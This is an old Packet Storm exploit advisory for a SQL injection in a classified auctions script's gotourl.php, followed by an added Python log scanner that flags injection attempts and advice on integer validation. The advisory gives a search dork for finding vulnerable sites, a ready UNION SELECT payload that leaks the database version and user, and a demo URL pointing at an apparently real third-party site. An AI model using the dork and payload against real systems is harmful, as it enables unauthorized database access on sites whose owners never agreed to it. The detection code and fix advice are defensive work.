pozscriptsauctions-sql.txt

2008-10-27T00:00:00
ID PACKETSTORM:71232
Type packetstorm
Reporter Hussin X
Modified 2008-10-27T00:00:00

Description

                                        
                                            `|___________________________________________________  
|  
| Classified Auctions (gotourl.php id) Remote SQL Injection Vulnerability  
|  
|___________________________________________________  
|---------------- Hussin X ------------------  
|  
| Author: Hussin X  
|  
| Home : WwW.IQ-ty.CoM  
|  
| email: darkangel_g85[at]Yahoo[DoT]com  
|  
|___________________________________________________  
|  
| script : http://www.pozscripts.com/index.php  
|  
| DorK : inurl:gotourl.php?id=  
|___________________________________________________  
  
Exploit:  
________  
  
  
www.[target].com/Script/gotourl.php?id=-30+union+select+concat(version(),user())--  
  
  
Demo:  
________  
  
http://www.singwebs.com/auction_demo/gotourl.php?id=-30+union+select+concat(version(),user())--  
  
  
  
`
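Detection note (an added example, not part of the original advisory or the vendor's code): the Python sketch below flags access-log requests to gotourl.php whose id parameter is not a plain integer, which is the shape of the request shown above. It assumes combined-format access logs and that legitimate id values are short digit strings; the names classify, scan and SAMPLE_LOG and all log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Request line inside a combined-format access log entry (assumed format).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Assumption: a legitimate id is a short run of digits and nothing else.
VALID_ID_RE = re.compile(r'\d{1,10}')
# Keywords and comment markers that turn a bad id into a likely injection probe.
SQL_HINT_RE = re.compile(r'\b(union|select)\b|--|/\*', re.I)

# Constructed sample log lines (documentation IP ranges, not real traffic).
SAMPLE_LOG = [
    '203.0.113.5 - - [27/Oct/2008:10:00:01 +0000] "GET /auction/gotourl.php?id=30 HTTP/1.1" 302 0',
    '203.0.113.9 - - [27/Oct/2008:10:00:07 +0000] "GET /auction/gotourl.php?id=-30+union+select+concat(version(),user())-- HTTP/1.1" 200 512',
    '203.0.113.9 - - [27/Oct/2008:10:00:09 +0000] "GET /auction/gotourl.php?id=-30%20UNION%20SELECT%20concat(version(),user())-- HTTP/1.1" 200 512',
    '198.51.100.2 - - [27/Oct/2008:10:01:00 +0000] "GET /auction/gotourl.php?id=abc HTTP/1.1" 200 0',
    '198.51.100.2 - - [27/Oct/2008:10:01:05 +0000] "GET /auction/index.php HTTP/1.1" 200 900',
]

def classify(line):
    """Return None for benign or unrelated lines, else (severity, decoded id)."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    url = urlsplit(m.group(1))
    if not url.path.lower().endswith('/gotourl.php'):
        return None
    # parse_qs decodes %xx and '+', so encoded variants are judged alike.
    ids = parse_qs(url.query, keep_blank_values=True).get('id', [])
    bad = [v for v in ids if not VALID_ID_RE.fullmatch(v)]
    if not bad:
        return None
    severity = 'sqli-pattern' if SQL_HINT_RE.search(bad[0]) else 'non-numeric-id'
    return severity, bad[0]

def scan(lines):
    """Return (line number, severity, decoded id) for every flagged line."""
    hits = []
    for n, line in enumerate(lines, start=1):
        result = classify(line)
        if result:
            hits.append((n, *result))
    return hits

if __name__ == '__main__':
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

The same integer-only rule is the server-side fix: reject any id that is not all digits before it reaches the query, and bind it as a parameter rather than concatenating it into SQL.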